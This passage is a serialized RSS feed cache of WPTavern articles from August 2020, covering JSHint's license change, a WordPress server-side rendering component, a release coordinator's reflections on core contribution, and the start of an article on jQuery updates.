weren&rsquo;t available for contact. Ultimately, the JSHint team was forced to rewrite the source code but only for the parts that were contributed by the five people who had not permitted the license change.</p>\n\n\n\n<p>At the beginning of August, JSHint updated to use the MIT Expat license in <a href=\"https://jshint.com/blog/2020-08-02/release-2-12-0/\">version 2.12.0</a> and is now GPL-compatible. Pennisi&rsquo;s cautionary tale of what he called &ldquo;the liberation of JSHint&rdquo; is a fascinating read that details the struggle of overcoming the challenges of the project&rsquo;s original license.  The key takeaway from this story is that software creators should strongly consider the ramifications of licensing up front, even if a large community of users seems unimaginable at first. Open source licensing takes a project further than its creator could ever have brought it alone.</p>\n\n\n\n<p>&ldquo;For many people, licensing is an esoteric part of software development,&rdquo; Pennisi said. &ldquo;It&rsquo;s a relatable opinion: the legal frameworks are intimidating, and most considerations can be addressed by simply defaulting to well-known free/open-source licenses.</p>\n\n\n\n<p>&ldquo;The trouble is that not all software is distributed under well-known free/open-source licenses. My hope is that the particulars of JSHint&rsquo;s decay help folks understand why licensing matters.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Aug 2020 22:47:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: Improved Server-Side Rendering of Dynamic WordPress Blocks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103242\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:181:\"https://wptavern.com/improved-server-side-rendering-of-dynamic-wordpress-blocks?utm_source=rss&utm_medium=rss&utm_campaign=improved-server-side-rendering-of-dynamic-wordpress-blocks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4547:\"<p class=\"has-drop-cap\">Over the weekend, David Gwyer <a href=\"https://wpgoplugins.com/an-improved-server-side-render-component-for-dynamic-wordpress-blocks/\">announced a custom server-side render component</a> for block plugins. The co-founder of WPGO Plugins primarily built his component to speed up the rendering process for dynamic blocks within his own plugins. However, he has now released this component for other block developers in the WordPress community.</p>\n\n\n\n<p>Most blocks are static. Their output remains the same and has no need to change. However, some blocks are dynamic. Their output needs to change based on a variety of reasons, such as the context they are output in or other changes within the WordPress system. For example, the core Latest Posts block is dynamic because the posts that it displays change as new posts are written. If they were output as a static block, the end-user would need to update the block each time a new post was written. Therefore, dynamic blocks come in handy because they are rendered by the server in the editor and on the front end.</p>\n\n\n\n<p>The problem with rendering from the server is that it can be slow, especially if the user is making several successive options changes to a particular block. With each change, the block must be re-rendered. The core experience with dynamic blocks has not been ideal.</p>\n\n\n\n<p>Gwyer&rsquo;s new component is <a href=\"https://github.com/dgwyer/server-side-render-x\">available via GitHub</a>. The project has little code, and its primary JavaScript file weighs in at just over 4kb (uncompressed). It introduces a new <code>&lt;ServerSideRenderX /&gt;</code> component, which works similarly to WordPress&rsquo;s existing <code><a href=\"https://developer.wordpress.org/block-editor/packages/packages-server-side-render/\">&lt;ServerSideRender /&gt;</a></code>. Block developers should have little trouble switching to this version for a quick test.</p>\n\n\n\n<p>He is currently using his component within the <a href=\"https://wordpress.org/plugins/flexible-faqs/\">Flexible FAQs</a> plugin. After running through a few tests, the plugin&rsquo;s dynamic blocks feel much more responsive, almost to the point where there is little difference between it and a JavaScript-rendered static block. </p>\n\n\n\n<img /> component works when updating a block.\" class=\"wp-image-103253\" />Live rendering when updating a dynamic block&rsquo;s options in the editor.\n\n\n\n<p>He also has plans to use it within his <a href=\"https://wordpress.org/plugins/simple-sitemap/\">Simple Sitemap</a> plugin and any other future dynamic blocks. That is assuming WordPress does not improve its server-side rendering component in the meantime.</p>\n\n\n\n<h2>How the Component Works</h2>\n\n\n\n<p class=\"has-drop-cap\">Gwyer&rsquo;s component is a fork of the core <code>&lt;ServerSideRender&gt;</code> component, which he says works well aside from the point where it transitions between render states. His custom component seeks to rectify that issue. &ldquo;The main additions were a new piece of state to track the previous block content to use as placeholder content, and a new component prop to handle the spinner location,&rdquo; he said.</p>\n\n\n\n<p>He laid out how both the core and his component works with the core component rendering as follows:</p>\n\n\n\n<ol><li>Render block.</li><li>Block attribute(s) updated.</li><li>Replace entire block content with spinner.</li><li>Render new block content.</li></ol>\n\n\n\n<p>His new component makes an important change that creates at least a perceived visual speed increase:</p>\n\n\n\n<ol><li>Render block.</li><li>Block attribute(s) updated.</li><li>Replace entire block content with placeholder content (current/previous content), plus spinner in the top right corner.</li><li>Render new block content.</li></ol>\n\n\n\n<p>&ldquo;Because the block content is essentially left unaltered until the new content is ready to be rendered it looks a lot faster as well as smoother,&rdquo; said Gwyer.</p>\n\n\n\n<p>The real question is whether this fork should make its way into the Gutenberg project and eventually merged into WordPress. WordPress developer Ben Gillbanks thinks so and has created a new <a href=\"https://github.com/WordPress/gutenberg/issues/24519\">GitHub ticket</a> with the request.</p>\n\n\n\n<p>&ldquo;I&rsquo;d like to see it added to Gutenberg as it&rsquo;s a much better rendering experience for dynamic blocks,&rdquo; said Gwyer. &ldquo;I&rsquo;d happily liaise with the team if they&rsquo;re are interested in including it in core.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Aug 2020 20:49:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"WPTavern: A Non-Technical Release Lead’s Journey to Becoming a Mentor for WordPress Core Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103152\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:243:\"https://wptavern.com/a-non-technical-release-leads-journey-to-becoming-a-mentor-for-wordpress-core-development?utm_source=rss&utm_medium=rss&utm_campaign=a-non-technical-release-leads-journey-to-becoming-a-mentor-for-wordpress-core-development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:21710:\"<p class=\"has-drop-cap\">In the summer of 2019, I was asked to help out with a WordPress release. A few months before, the Core Team representatives reached out to other teams in an effort to increase the diversity of the release teams, and I started seriously considering it. </p>\n\n\n\n<p>At the time, I was already heavily involved in the WordPress ecosystem and was in my second year as the WordPress Community and Partnership Manager at SiteGround, but I had no experience whatsoever on how WordPress gets done from a Core point of view. Still, when Josepha Haden, WordPress.org Executive Director, pinged me, I said yes without hesitation. And it proved one of the most challenging and rewarding experiences of my life. Here is how.&nbsp;</p>\n\n\n\n<img />Josepha and I walking around Vienna, WCEU 2016 &ndash; Photo by <a href=\"https://www.flickr.com/photos/lucasartoni/\">Luca Sartoni</a>\n\n\n\n<h2>An Accidental Contributor: My Path in Tech</h2>\n\n\n\n<p>From an early age, I seemed to be predestined to become a developer. My parents are programmers, they started in the sixties, and I got my first personal computer in 1982 when people in Italy didn&rsquo;t really have an idea of what those were.</p>\n\n\n\n<p>I followed after their work ethos and I thought that their job was fascinating, making a machine do what you want, but I was drawn to other career options. In fact, I didn&rsquo;t really know what I wanted to do when I grew up, but computers and websites kept being a big part of my personal and professional life.</p>\n\n\n\n<p>While back-end programming was never something that interested me, I found myself taking a class on web design in 1999, then signed up for a degree in Arts and Multimedia in 2004.  I finally found WordPress in 2008 and started making a living off of it in 2010.&nbsp;</p>\n\n\n\n<p>Soon, I realized my true skill was helping clients who were coming to me with a request for a website to better focus on their &ldquo;why&rdquo; for the website and think about their business and marketing strategy before they hired me. I wrote books on business planning, productivity, and websites.  I also started giving talks at WordCamps and other events to educate freelancers on those topics.&nbsp;</p>\n\n\n\n<p>In 2015, I randomly met some people who were involved in the WordPress community, which led me to start contributing too. I didn&rsquo;t have development skills so I never thought I could contribute to OSS, but it turns out that was unnecessary. I met people who pointed me to the many different teams that make WordPress and started being active in Polyglots first and Community later.</p>\n\n\n\n<img />My first WordCamp Talk: The Rebirth of the Italian Community, at WordCamp London 2016\n\n\n\n<p>I kept working on my business, but the more I contributed to WordPress, the more I wanted to find a way to help thousands of people at a time.  My outreach efforts of giving talks, helping community organizers, and writing content needed to scale.&nbsp;</p>\n\n\n\n<p>This is where I met SiteGround.  In the summer of 2017, they were looking for a Community Manager and despite not being one by trade I decided to apply and got the job. Joining the company allowed me to have sponsored time to contribute to WordPress.  It also allowed me to tap into the collective knowledge of my colleagues when I start cooking up new ideas for the project.</p>\n\n\n\n<p>So I said yes without hesitation, but the truth is that this yes was almost five years in the making. In addition, I felt that Josepha and SiteGround trusted me to do a good job.  In return, I trusted the WordPress community to help me figure out all the things that I needed to learn.</p>\n\n\n\n<h2>How WordPress Gets Done</h2>\n\n\n\n<p>The other encouraging factor was that ever since WordPress 5.0, a release was no longer made by one person, as it used to be for years, or a person with a couple of deputies. Now there was a whole team at work, affectionately known as &ldquo;the squad,&rdquo; so there are many hands on deck.</p>\n\n\n\n<h3>A Lot of Communication</h3>\n\n\n\n<p>During a release cycle, there is a lot of communication.  There are blog posts from different Make teams. At each stage of the release, there are blog posts in the News section of WordPress.org. There is constant chatter in the public Slack channel and there is a private one which is the safety net for the new people that initially might feel intimidated by asking questions in a large public channel.&nbsp;</p>\n\n\n\n<h3>The Different Roles in the Release Squad</h3>\n\n\n\n<img />WordPress 5.3 had a release squad of 12 people and 654 contributors. WordPress 5.5 threw it out of the park with 805 contributors!\n\n\n\n<p>The thing that I love the most about this model for the release is the variety of roles that it includes. There are developers, designers, marketers, technical writers, and project managers. WordPress is not only made of code, and it&rsquo;s great to see all these different skills coming together to contribute to its release.&nbsp;</p>\n\n\n\n<p>The role of the Release Coordinator (the one I covered for WordPress 5.3 and 5.4) and of the Triage PM (role that was covered by the excellent David Baumwald for 5.3, 5.4, and 5.5) is to try to keep an eye on all the moving parts. And I say <em>try</em> because it&rsquo;s nearly impossible. This is why there are focus leads for the different parts that are getting worked on.</p>\n\n\n\n<p>Matt Mullenweg is the project lead and has been the release lead since WordPress 5.0.  He comes up with the high-level <a href=\"https://wordpress.org/about/roadmap/\">roadmap</a> and the <a href=\"https://make.wordpress.org/core/2018/12/08/9-priorities-for-2019/\">focus projects</a>.&nbsp; But beyond that, he is not involved with the day-to-day life of Core development. In over one year of being involved in Core releases, Matt asked only once to add a <a href=\"https://make.wordpress.org/core/2020/03/03/fullscreen-mode-enabled-by-default-in-the-editor/#comment-38054\">feature</a>.&nbsp;</p>\n\n\n\n<p>I am annoyed when people think that everything that happens in WordPress is because Matt wants it that way. It diminishes the role of all the people who care about the project and take it upon themselves to move things forward, to shepherd issues, to champion tickets, and in general to commit to contribute to make WordPress better for everyone, no matter if they do it for one ticket or work on it full time.&nbsp;</p>\n\n\n\n<h3>Component Maintainers and Core Committers</h3>\n\n\n\n<p>A group of people who are instrumental in shaping a release are the <a href=\"https://make.wordpress.org/core/2020/02/09/what-does-it-mean-to-be-a-component-maintainer-a-refresher/\">component maintainers</a>. They are responsible to look after a certain component that makes up Core and see how tickets in that area are proceeding. They are the ones who can evaluate if a ticket is ready to be merged.</p>\n\n\n\n<p>Once a ticket is deemed ready, Core Committers enter the scene. They do a final review of the ticket. They might request some changes, or make the changes themselves while committing. This is the thing that surprised me the most probably. I really didn&rsquo;t think that a commit could take hours, but it definitely can. In the releases I coordinated, I definitely observed not a lot of engagement from maintainers and committers, and this is very demotivating for people working on tickets. Not everything can go into a release, even if the patch is ready, because there aren&rsquo;t enough people to review, give feedback, and ultimately commit. With few resources, you have to make choices and those will not always align with each WordPress user or contributor preferences.&nbsp;</p>\n\n\n\n<p>This is probably one of the biggest challenges WordPress will have to tackle moving forward: How can we reactivate people who can give a big help?</p>\n\n\n\n<h3>The Release Party</h3>\n\n\n\n<img />Photo by <a href=\"https://www.flickr.com/photos/damndirty/\">Florian Ziegler</a>\n\n\n\n<p>Despite these issues, things get done and when the release is ready, we celebrate with a party. I don&rsquo;t know who started calling them Release Parties or when they started.  What I know is that for 5.3 and 5.4, I hosted quite a few, and they were all a lot of fun.&nbsp;</p>\n\n\n\n<p>On the day of one of the steps of the release (it might be Betas, Release Candidates or General Release) the Core channel gets very active: a lot of people come online to see how the version of WordPress gets released. There are multiple steps and different people involved with different tasks. The release steps are documented in the Core handbook and are followed publicly so everyone can see them all.&nbsp;</p>\n\n\n\n<p>The biggest party is the general release day; there is one specific moment which is incredibly powerful. WordPress has a <a href=\"https://wordpress.org/download/counter/\">download counter</a>, so before releasing the new version, the squad takes a screenshot of the previous one, we all say goodbye and welcome the new kid. Despite everything being virtual, this moment is almost tangible and will never cease to move me. We made WordPress, once again.</p>\n\n\n\n<ul><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li></ul>Screenshots of the WordPress counter seconds before WordPress 5.5 was released and two hours later.\n\n\n\n<h2>12 Months as a Core Contributor</h2>\n\n\n\n<p>While I was writing this article, it occurred to me that I have been a Core contributor for a year now. I still have my full-time role at SiteGround, which at times I found hard to juggle, so I have to give my team credit for their support.</p>\n\n\n\n<p>I still can&rsquo;t write PHP and despise JavaScript deeply, but when I look back, I am incredibly proud of the changes that have happened in the past 12 months. I can not take credit for all of them, but I am happy I was able to be somehow part of them.</p>\n\n\n\n<h3>Release Schedule</h3>\n\n\n\n<p>One thing that a lot of contributors asked for was a mid-term schedule of releases, to better fit them around their work and personal calendar. Being the new kid can be hard because you don&rsquo;t know the whole history and background of why things are done a certain way, but that is also a perk. You are free to restart conversations.  After discussing it with the squad and other teams, it was clear to me that it was just a matter of &ldquo;who is going to bring this up with Matt&rdquo;. And so I did. A couple of days later a <a href=\"https://make.wordpress.org/core/2019/11/21/tentative-release-calendar-2020-2021/\">tentative release schedule</a> until WordPress 6.0 was published on the Core blog, and we have been using it ever since.</p>\n\n\n\n<h3>Bigger Release Squad and Mentorship</h3>\n\n\n\n<p>The release squad is also getting bigger with every release.  Many teams are involved in making it and affected by it. It&rsquo;s important for all these teams to be represented in the process. In WordPress 5.5, there are several new roles, and in 5.6 there will be even more: Test, Documentation, Support are all vital components of what makes WordPress great, so having their feedback while the software is in active development is important.</p>\n\n\n\n<p>And it&rsquo;s important to have mentors.  This is a major improvement that Josepha introduced in WordPress 5.3. The release squad is not only made of focus leads, but there is a growing group of mentors able to help new contributors learn the ropes. The idea is that those people will eventually become mentors and teach new people. This is another great way to have more and more people involved in Core, with different skills and backgrounds.&nbsp;</p>\n\n\n\n<p>And this brings me to the biggest change (and challenge) of all. WordPress 5.6, which is shaping up to be a massive release, will have a <a href=\"https://wptavern.com/wordpress-names-5-5-release-leads-plans-all-women-release-squad-for-5-6\">squad entirely made of women</a> and people who identify as female. Like a lot of things in WordPress, it all started with a <a href=\"https://twitter.com/JosephaHaden/status/1194431234245447680?s=20\">&ldquo;Thinking out loud&rdquo; moment</a> and is now a reality. Work on this release will start very soon, and I am excited to be part of it as a mentor.</p>\n\n\n\n<img />Fellow female contributors leading the Polyglots team at WordCamp Torino 2018. Picture by Gianni Vascellari\n\n\n\n<h2 class=\"is-style-default\">WordPress Needs Your Help</h2>\n\n\n\n<p>I wish I could say it is all unicorns and rainbows, but it&rsquo;s not. The number of people actively involved in making this project a reality is still very small compared to the magnitude of its reach.</p>\n\n\n\n<p>I am very much a doer, so I wish people took the time and energy they take into critiquing WordPress and turn it into active contribution time. Yes, sometimes it requires being very stubborn about a ticket and it requires to follow up on it relentlessly, but I still think it&rsquo;s worth it.</p>\n\n\n\n<p>Active participation also means leaving constructive feedback in tickets or offering to take notes during dev chat.  That is the curse and the beauty of a massive project.  There is always something to do!</p>\n\n\n\n<p>In the last few years, I have also seen an increase in contribution from different kinds of companies. At SiteGround, for example, we mostly contributed to events and the community for years. We sponsored, and we volunteered, we were organizers and speakers. We worked a lot within the Spanish WordPress community to help it develop and grow, and now it&rsquo;s one of the largest in the global community. In the last year, we have increased the hours we dedicate to more technical teams. I am still active in Core as a mentor and as the team representative.  One of our WordPress engineers, Stanimir Stoyanov, is part of the Security team, and one of our JavaScript Engineers, Kiril Zhelyazkov, is now dedicating a couple of days per week to Gutenberg.</p>\n\n\n\n<img />My colleague and Core and Security contributor, Stanimir Stoyanov\n\n\n\n<p>These topics align with our values, so it was a natural progression for us to become more involved.</p>\n\n\n\n<p>Finally, I hope to see people get involved in a proposal I published a few days ago in the Core blog about <a href=\"https://make.wordpress.org/core/2020/08/07/e2e-end-to-end-testing-in-core-working-group-proposal/\">end-to-end tests</a>. Right now there is one, and I&rsquo;m sure we can do better. Again, developers are not the only ones needed. Users are the rarest contributors and probably the ones the project needs the most to finally have some user testing in place. I am not a developer, and I&rsquo;m happy that non-developers can make an impact.&nbsp;</p>\n\n\n\n<h2>My Personal Concerns and Hopes for the Future of the Project</h2>\n\n\n\n<p>When I started contributing to Core, I started a note on my computer with some observations. Not having 17 years of experience in the project helps me see things without bias, and not being a developer helps me see the project more as a living, breathing body, instead of components or tickets. Allow me to share my concerns, hopes, and dreams for the future.</p>\n\n\n\n<h3>Component Maintainers and Core Committers: You Are Needed More Than Ever</h3>\n\n\n\n<p>At the time of writing this article, the project has about 60 committers and 60 component maintainers, with a lot of people pulling double, triple, and sometimes sextuple duties. But the reality is that in WordPress 5.4 and 5.5 hundreds of commits were made by Sergey Biryukov. I am incredibly grateful for Sergey&rsquo;s work.  At the same time, I feel like we are inadvertently building a bus factor into Core. The majority of the people with Core Commit access did not commit one ticket. Similarly, I reached out to all the component maintainers to hear about their plans for the upcoming releases and only about 50% of the components replied.</p>\n\n\n\n<p>How do we make sure that the people who have the power, and thus the responsibility, to help with committing and shepherding tickets are involved? But also, how do we encourage people to step down and declare themselves inactive so new people can step up?&nbsp;</p>\n\n\n\n<p>My career spans over 25 years in different industries, and one thing remains the same: when people see there is someone else filling a role, they will be less motivated and sometimes even intimidated to step up. Scarcity not only drives purchases, it drives new engagement.</p>\n\n\n\n<p>The Community Team, for example, <a href=\"https://make.wordpress.org/community/community-deputies/\">maintains a list of deputies and their different statuses</a>. I have been wondering if Core could do something similar so when new people want to step up they can see at a first glance which components are missing maintainers. People who complain about &ldquo;The Core Developers&rdquo; will not see them as a blob, but as individuals who at any point in time might be inactive for a period. When you see that there are actually only a few people actively reviewing and committing, you might be more prone to understand why not every ticket can make it to the finish line.</p>\n\n\n\n<h3>Documentation Is the Highest Form of Generosity</h3>\n\n\n\n<p>I say this every time I speak about contributing to OSS: documentation is frequently lacking. Oftentimes, what is there is outdated.&nbsp;</p>\n\n\n\n<p>How do we make sure that documentation is not an afterthought but is baked into the development process?</p>\n\n\n\n<img />Handbook from it.wordpress.org &ndash; How to translate WordPress to Italian. Photo by Gianni Vascellari\n\n\n\n<p>There is a lot of work put into writing dev notes for the changes that affect development, but that is not the only documentation that is needed. Some of the processes described in the Core handbooks are outdated, some are missing because they live in experienced contributors&rsquo; minds.</p>\n\n\n\n<p>As a big fan of Gutenberg and rich, engaging text, I wish our handbooks would fully leverage the power of the block editor and be more inviting. Right now they are a wall of text and whenever we tell people to look at the handbooks I feel my heart shrinking.</p>\n\n\n\n<p>Possible solutions, which I am not sure are technically doable, but a girl can dream: sync with GitHub to solve at least the version control issue. Then recruit, recruit, recruit and work with Documentation, Meta, and Design to provide useful, engaging, readable, easy-to-scan handbooks.</p>\n\n\n\n<h3>Keep Track of the Moving Parts and Work as One</h3>\n\n\n\n<p>The other thing that I notice often is how teams, focuses, and components work in silos.</p>\n\n\n\n<p>This is absolutely not done to be gatekeepers, it&rsquo;s just how every team self-organized over the years.</p>\n\n\n\n<p>We need to find a way to have a bird&rsquo;s eye view of what is going into the next release and what are all the moving parts.</p>\n\n\n\n<img /><\\/span> is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported Licen\",\"focal_length\":\"23\",\"iso\":\"3200\",\"shutter_speed\":\"0.076923076923077\",\"title\":\"\",\"orientation\":\"0\"}\" data-image-title=\"People-at-Contributor-Day-WordCamp-Europe\" data-image-description=\"\" data-medium-file=\"https://wptavern.com/wp-content/uploads/2020/08/People-at-Contributor-Day-WordCamp-Europe-300x200.jpg\" data-large-file=\"https://wptavern.com/wp-content/uploads/2020/08/People-at-Contributor-Day-WordCamp-Europe-500x333.jpg\" loading=\"lazy\" width=\"2000\" height=\"1333\" src=\"https://wptavern.com/wp-content/uploads/2020/08/People-at-Contributor-Day-WordCamp-Europe.jpg\" alt=\"People sitting at round tables during a contributor day\" class=\"wp-image-103206\" srcset=\"https://wptavern.com/wp-content/uploads/2020/08/People-at-Contributor-Day-WordCamp-Europe.jpg 2000w, https://wptavern.com/wp-content/uploads/2020/08/People-at-Contributor-Day-WordCamp-Europe-300x200.jpg 300w, https://wptavern.com/wp-content/uploads/2020/08/People-at-Contributor-Day-WordCamp-Europe-500x333.jpg 500w, https://wptavern.com/wp-content/uploads/2020/08/People-at-Contributor-Day-WordCamp-Europe-768x512.jpg 768w, https://wptavern.com/wp-content/uploads/2020/08/People-at-Contributor-Day-WordCamp-Europe-1536x1024.jpg 1536w\" sizes=\"(max-width: 2000px) 100vw, 2000px\" />People Making WordPress at Contributor Day, WordCamp Europe 2015 &ndash; Photo by Florian Ziegler\n\n\n\n<p>Trac is very granular and you have a number of ready-made reports, you can <a href=\"https://core.trac.wordpress.org/milestone/5.6\">filter by milestones</a> and see how many tickets are in each component, but that is just part of the story.</p>\n\n\n\n<p>Yes, I am talking about finding a way to manage the project as a whole and not as bits and bobs.&nbsp;</p>\n\n\n\n<h3>Enter GitHub. At Some Point.&nbsp;</h3>\n\n\n\n<p>This is not happening anytime soon, but I hope it will eventually happen. Move development <strong>and</strong> project management of WordPress to GitHub, like Gutenberg has been doing.&nbsp;</p>\n\n\n\n<p>I know that for many it will be an incentive to contribute to WordPress in a way that is more familiar. It will lower the bar to entrance, which is always welcome. With some handy tutorials, it will allow non-technical people to contribute to documentation, testing, and project management.</p>\n\n\n\n<h2>The Future is Bright</h2>\n\n\n\n<p>Despite all the issues, or maybe because of them, the future of WordPress is bright.&nbsp;</p>\n\n\n\n<p>I have been lurking around multiple teams in these years, and lately I notice more people coming on board, more people being involved in each release, more people stepping up in leadership roles in different teams. I have also noticed an increase in diversity, which is always a welcome change.</p>\n\n\n\n<p>Bottom line: WordPress needs all of us to make it happen. I hope to see you on board!</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Aug 2020 15:04:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Francesca Marano\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Major jQuery Changes on the Way for WordPress 5.5 and Beyond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103051\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:185:\"https://wptavern.com/major-jquery-changes-on-the-way-for-wordpress-5-5-and-beyond?utm_source=rss&utm_medium=rss&utm_campaign=major-jquery-changes-on-the-way-for-wordpress-5-5-and-beyond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5775:\"<img />\n\n\n\n<p class=\"has-drop-cap\">With all of the advancements made in JavaScript and newer, shinier frameworks, it is sometimes easy to forget that WordPress still relies on the aging jQuery library. The same holds true for thousands of plugins and themes in the official WordPress directories.</p>\n\n\n\n<p>For some, this may feel like a journey back to the mid-2000s, a time when JavaScript very much felt like the Wild West. jQuery solved many issues for a programming language that had not kept up with what developers needed to accomplish.</p>\n\n\n\n<p>A ticket created by Aaron Jorbin four years ago to <a href=\"https://core.trac.wordpress.org/ticket/37110\">move WordPress to the latest 3.x branch</a> of jQuery is finally coming to fruition. However, the WordPress development team will need to make this transition in stages, particularly after waiting for so long.</p>\n\n\n\n<p>WordPress has fallen behind on keeping jQuery updated. For a platform that routinely suggests that users need to be running the latest and greatest version, it is odd that WordPress itself has not done the same with third-party code that it relies on. WordPress currently bundles jQuery version 1.12.4, a version of the library released in 2016. It is also a version that supports Internet Explorer 6, 7, and 8.</p>\n\n\n\n<p>&ldquo;Mostly because for the last couple of years the focus has shifted to other/more modern JavaScript libraries,&rdquo; said WordPress lead developer Andrew Ozz on why the platform has fallen behind. &ldquo;The number of JavaScript developers that contribute to core is limited, and there is a very high demand.&rdquo;</p>\n\n\n\n<p>In the long term, he said a future option might be to move the WordPress admin to native (vanilla) JavaScript completely, which is a sentiment shared in the comments on his announcement post to <a href=\"https://make.wordpress.org/core/2020/06/29/updating-jquery-version-shipped-with-wordpress/\">update the version of jQuery</a> bundled with WordPress. &ldquo;This would be great,&rdquo; he said, &ldquo;and at the same time, a very large effort.&rdquo;</p>\n\n\n\n<p>Far too many themes and plugins rely on this dated version of jQuery to move any faster. While plugins could choose to overwrite core WordPress&rsquo;s bundled version of jQuery with the latest version, themes have had no such option. The official theme directory guidelines require themes to utilize the core-bundled scripts, including jQuery. There is a good reason for this: for the most part, it ensures compatibility with core and third-party plugins.</p>\n\n\n\n<p>However, now it is time to move on.</p>\n\n\n\n<h2>What Developers and Users Need to Know</h2>\n\n\n\n<img />\n\n\n\n<p class=\"has-drop-cap\">WordPress has a three-stage plan to bring jQuery up to date. The core team asks that theme and plugin developers begin testing their extensions with the <a href=\"https://wordpress.org/plugins/wp-jquery-update-test/\">Test jQuery Updates</a> plugin. This will help them bring code up to date throughout this transitional period.</p>\n\n\n\n<p>The first step in this process will be removing the jQuery Migrate 1.4.1 script from WordPress 5.5, which was <a href=\"https://wptavern.com/wordpress-5-5-eckstine-introduces-block-directory-block-patterns-and-automatic-updates-for-themes-and-plugins\">released earlier today</a>. This version of jQuery Migrate makes older code compatible and helps developers migrate to jQuery 1.9+.</p>\n\n\n\n<p>This move will undoubtedly break some plugins and themes. The core team has made the <a href=\"https://wordpress.org/plugins/enable-jquery-migrate-helper/\">Enable jQuery Migrate 